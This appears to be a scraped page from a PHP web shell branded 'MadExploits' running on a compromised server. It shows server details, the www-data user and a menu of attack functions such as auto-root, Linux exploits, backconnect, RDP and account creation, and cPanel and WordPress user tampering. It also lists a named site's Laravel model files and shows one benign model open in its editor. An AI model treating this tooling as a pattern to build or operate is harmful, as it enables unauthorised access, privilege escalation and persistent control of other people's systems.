Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.105
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
thecigaretteboxes.com /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
Advertisement.php
184
B
-rw-r--r--
Blog.php
510
B
-rw-r--r--
BlogSlider.php
364
B
-rw-r--r--
Category.php
599
B
-rw-r--r--
ContactEntry.php
183
B
-rw-r--r--
HeaderContent.php
307
B
-rw-r--r--
HomeSlider.php
294
B
-rw-r--r--
Images.php
420
B
-rw-r--r--
Order.php
730
B
-rw-r--r--
Page.php
498
B
-rw-r--r--
Product.php
1.46
KB
-rwxr-xr-x
ProductGallery.php
330
B
-rw-r--r--
SocialMediaLink.php
186
B
-rw-r--r--
Subscriber.php
181
B
-rw-r--r--
Testimonial.php
319
B
-rw-r--r--
Type.php
214
B
-rw-r--r--
User.php
832
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Product.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Product extends Model { use HasFactory; protected $table='products'; protected $fillable = [ 'is_home', 'id', 'product_type', 'product_category', 'title', 'product_id', 'title', 'product_name', 'slug', 'product_name_cat', 'description', 'keywords', 'indexpage', 'meta_title', 'meta_description', 'short_description', 'detail', 'front_image', 'image1', 'image2', 'image3', 'image4', 'twitterbanner', 'facebookbanner', 'meta_keywords', 'front_image_alt', 'back_image_alt', 'back_image_title', 'front_image_title', 'back_image', 'status' ]; public function images(){ return $this->hasMany(Images::class,'product_id' ,'id',)->where('status', '=', 1); } public function category(){ return $this->belongsTo(Category::class,'product_name_cat','slug'); } public function type(){ return $this->belongsTo(Type::class,'product_type'); } public function getProductsList() { return $this->with('category') ->offset(0)->limit(6)->get(); } public function getByColVal($col,$val){ return $this->where($col,$val); } }
Close